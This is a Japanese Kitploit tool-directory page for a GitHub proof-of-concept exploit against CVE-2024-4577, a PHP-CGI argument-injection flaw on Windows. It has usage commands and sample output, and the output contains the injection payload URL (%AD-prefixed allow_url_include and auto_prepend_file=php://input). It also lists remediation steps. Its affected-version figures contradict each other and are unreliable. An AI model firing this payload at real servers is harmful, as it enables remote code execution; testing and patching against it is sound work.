Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4577 — PHP <8.2.15(Windows)の重大な脆弱性に対する概念実証(PoC)RCEエクスプロイトで、攻撃者が任意のコマンドを実行できるようにします。 | Kitploit
ツール/GitHubGitHub/manuelinfosec/cve-2024-4577
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmanuelinfosec/cve-2024-4577

CVE-2024-4577

PHP <8.2.15(Windows)の重大な脆弱性に対する概念実証(PoC)RCEエクスプロイトで、攻撃者が任意のコマンドを実行できるようにします。

リポジトリを見る
912年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577: PHP の CGI 設定における重大な脆弱性

PHP の CGI モードには深刻なセキュリティ上の欠陥が存在し、攻撃者が URL パラメータを操作することで任意のコマンドを実行できるようになります。

影響を受けるバージョン

  • Windows 上で php-cgi を実行している PHP 7.4.29 未満および 8.0.19 未満のバージョン。

攻撃手法

  • 攻撃者は、特別に細工したリクエストを PHP CGI スクリプトに送信することで、この脆弱性を悪用できます。これらのリクエストは悪意のあるパラメータを注入し、任意のコマンドの実行を可能にします。これにより、システムが完全に侵害される可能性があります。

使用方法

前提条件

スクリプトを実行する前に、システムに Python 3 がインストールされていることを確認してください。さらに、HTTP リクエストを処理するために requests ライブラリが必要です。

依存関係のインストール

必要な依存関係は pip を使用してインストールできます。pip がインストールされていない場合は、こちら の手順に従ってください。

  1. ターミナルまたはコマンドプロンプトを開きます。
  2. 以下のコマンドを実行して requests ライブラリをインストールします:
root@kitploit:~
pip install requests

スクリプトの実行

CVE-2024-4577 の脆弱性について対象の URL を確認するには、次の手順に従います:

  • python3 を使用して、対象の URL を引数としてスクリプトを実行します。
root@kitploit:~
python3 exploit.py <target>

たとえば、URL http://example.com をテストするには、次のように実行します:

root@kitploit:~
python3 exploit.py http://example.com

スクリプトの出力

スクリプトは、指定された対象 URL の脆弱性をテストし、結果をコンソールに出力します。潜在的な脆弱性が検出されたか、脆弱性が検出されなかったかを示します。

root@kitploit:~
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include

修復手順

  1. PHP を最新バージョンに更新します。
  2. 入力パラメータが適切にサニタイズおよび検証されていることを確認します。
  3. CGI パラメータ処理を制限するために、安全な構成設定を適用します。

クレジット

この脆弱性は Orange Tsai (@orange_8361) によって発見されました。

ツールをダウンロード